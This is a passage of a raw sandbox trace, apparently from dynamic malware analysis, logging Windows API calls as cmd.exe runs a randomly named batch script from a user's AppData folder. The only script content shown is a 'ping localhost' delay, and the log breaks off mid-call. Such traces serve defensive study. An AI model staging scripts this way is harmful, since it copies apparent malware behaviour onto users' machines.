"c:\\windows\\system32\\locale.nls") Region: id = 8903 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8904 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 8905 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8906 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8907 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8908 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8909 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8910 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8911 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") 
Region: id = 8912 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8913 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 8914 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8915 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8916 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 8917 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 8918 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8919 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 8920 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 8921 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 8922 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 8962 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = 
"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8963 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8964 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8965 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 9039 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 105 os_tid = 0xecc [0117.970] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f7f4 | out: lpSystemTimeAsFileTime=0x12f7f4*(dwLowDateTime=0x838efd80, dwHighDateTime=0x1d440a9)) [0117.970] GetCurrentProcessId () returned 0xec8 [0117.970] GetCurrentThreadId () returned 0xecc [0117.970] GetTickCount () returned 0x27f6b [0117.970] QueryPerformanceCounter (in: lpPerformanceCount=0x12f7ec | out: lpPerformanceCount=0x12f7ec*=17475922038) returned 1 [0117.971] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0117.971] __set_app_type (_Type=0x1) [0117.971] __p__fmode () returned 0x76b331f4 [0117.971] __p__commode () returned 0x76b331fc [0117.971] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0117.971] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0117.971] GetCurrentThreadId () returned 0xecc [0117.972] OpenThread (dwDesiredAccess=0x1fffff, 
bInheritHandle=0, dwThreadId=0xecc) returned 0x38 [0117.972] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.972] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0117.972] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.972] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.972] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f784 | out: phkResult=0x12f784*=0x0) returned 0x2 [0117.972] VirtualQuery (in: lpAddress=0x12f7bb, lpBuffer=0x12f754, dwLength=0x1c | out: lpBuffer=0x12f754*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.975] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f754, dwLength=0x1c | out: lpBuffer=0x12f754*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0117.975] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f754, dwLength=0x1c | out: lpBuffer=0x12f754*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0117.975] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f754, dwLength=0x1c | out: lpBuffer=0x12f754*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.975] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f754, dwLength=0x1c | out: lpBuffer=0x12f754*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0117.975] GetConsoleOutputCP () returned 0x1b5 [0117.976] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: 
lpCPInfo=0x4a9e4260) returned 1 [0117.976] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0117.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.976] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0117.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.976] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.976] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.976] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.977] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.977] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.977] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0117.977] GetEnvironmentStringsW () returned 0x190150* [0117.977] FreeEnvironmentStringsW (penv=0x190150) returned 1 [0117.977] GetEnvironmentStringsW () returned 0x190150* [0117.978] FreeEnvironmentStringsW (penv=0x190150) returned 1 [0117.978] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e6f4 | out: phkResult=0x12e6f4*=0x40) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x0, lpData=0x12e700*=0x0, lpcbData=0x12e6f8*=0x1000) returned 0x2 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x1, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x0, lpData=0x12e700*=0x1, lpcbData=0x12e6f8*=0x1000) returned 0x2 [0117.978] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x0, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x40, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x40, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x0, lpData=0x12e700*=0x40, lpcbData=0x12e6f8*=0x1000) returned 0x2 [0117.978] RegCloseKey (hKey=0x40) returned 0x0 [0117.978] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e6f4 | out: phkResult=0x12e6f4*=0x40) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x0, lpData=0x12e700*=0x40, lpcbData=0x12e6f8*=0x1000) returned 0x2 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x1, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x0, lpData=0x12e700*=0x1, lpcbData=0x12e6f8*=0x1000) returned 0x2 [0117.978] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, 
lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x0, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.979] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x9, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.979] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x4, lpData=0x12e700*=0x9, lpcbData=0x12e6f8*=0x4) returned 0x0 [0117.979] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e6fc, lpData=0x12e700, lpcbData=0x12e6f8*=0x1000 | out: lpType=0x12e6fc*=0x0, lpData=0x12e700*=0x9, lpcbData=0x12e6f8*=0x1000) returned 0x2 [0117.979] RegCloseKey (hKey=0x40) returned 0x0 [0117.979] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635e [0117.979] srand (_Seed=0x5b88635e) [0117.979] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd\"" [0117.979] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd\"" [0117.979] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.979] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1919b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0117.980] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.980] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.980] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0117.980] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.980] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.980] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0117.980] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0117.980] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0117.980] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0117.980] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0117.980] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0117.980] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0117.980] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0117.980] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f4c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.980] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f4c0, lpFilePart=0x12f4bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f4bc*="Desktop") returned 0x18 [0117.980] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.981] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f23c | out: lpFindFileData=0x12f23c) returned 0x18ffe0 [0117.981] FindClose (in: hFindFile=0x18ffe0 | out: hFindFile=0x18ffe0) returned 1 [0117.981] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f23c | out: lpFindFileData=0x12f23c) returned 0x18ffe0 [0117.981] FindClose (in: hFindFile=0x18ffe0 | out: hFindFile=0x18ffe0) returned 1 [0117.981] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f23c | out: lpFindFileData=0x12f23c) returned 0x18ffe0 [0117.981] FindClose (in: hFindFile=0x18ffe0 | out: hFindFile=0x18ffe0) returned 1 [0117.981] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.981] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0117.981] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0117.982] GetEnvironmentStringsW () returned 0x190150* [0117.982] FreeEnvironmentStringsW (penv=0x190150) returned 1 [0117.982] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.984] GetConsoleOutputCP () returned 0x1b5 [0117.984] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.984] GetUserDefaultLCID () returned 0x409 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f600, cchData=128 | out: lpLCData="0") returned 2 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f600, cchData=128 | out: lpLCData="0") returned 2 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f600, cchData=128 | out: lpLCData="1") returned 2 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") 
returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0117.985] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0117.986] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0117.986] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0117.987] GetConsoleTitleW (in: lpConsoleTitle=0x1901e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.139] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0118.140] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0118.140] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0118.140] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0118.144] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd", _String2=")") returned 58 [0118.144] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd") returned 3 [0118.144] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd") returned 3 [0118.144] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd") returned 6 [0118.144] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd") returned 6 [0118.144] _wcsicmp 
(_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd") returned 15 [0118.144] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd") returned 15 [0118.148] GetConsoleTitleW (in: lpConsoleTitle=0x12f2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.148] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0118.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0118.149] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f0b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f0ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f0ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0118.149] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0118.149] SetErrorMode (uMode=0x0) returned 0x0 [0118.149] SetErrorMode (uMode=0x1) returned 0x0 [0118.149] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x19dc08, lpFilePart=0x12ee18 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x12ee18*="vMfCCeRYkvQy") returned 0x2d [0118.150] SetErrorMode (uMode=0x0) returned 0x1 [0118.150] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0118.150] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.155] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0118.155] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd", fInfoLevelId=0x1, lpFindFileData=0x12ebb4, fSearchOp=0x0, lpSearchFilter=0x0, 
dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ebb4) returned 0x1908f0 [0118.155] FindClose (in: hFindFile=0x1908f0 | out: hFindFile=0x1908f0) returned 1 [0118.155] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0118.155] GetConsoleTitleW (in: lpConsoleTitle=0x12f08c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.155] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0118.159] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0118.159] IdentifyCodeAuthzLevelW () returned 0x1 [0118.169] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0118.169] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0118.169] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0118.169] CloseCodeAuthzLevel () returned 0x1 [0118.169] SetErrorMode (uMode=0x0) returned 0x0 [0118.169] SetErrorMode (uMode=0x1) returned 0x0 [0118.169] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd", nBufferLength=0x104, lpBuffer=0x1904e8, lpFilePart=0x12ef78 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd", lpFilePart=0x12ef78*="WlLsor5U.cmd") returned 0x3a [0118.169] SetErrorMode (uMode=0x0) returned 0x1 [0118.169] CmdBatNotification () returned 0x0 [0118.169] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\wllsor5u.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12efbc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0118.170] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0118.170] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.170] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.170] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.170] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.170] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x12efa0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x12efa0*=0x91, lpOverlapped=0x0) returned 1 [0118.170] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0118.170] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0118.171] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.171] GetFileType (hFile=0x58) returned 0x1 [0118.171] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.171] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0118.171] _wcsicmp (_String1="ping", _String2=")") returned 71 [0118.171] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0118.171] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0118.172] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0118.172] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0118.172] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0118.172] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0118.173] _tell (_FileHandle=3) returned 21 [0118.173] _close (_FileHandle=3) returned 0 [0118.173] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, 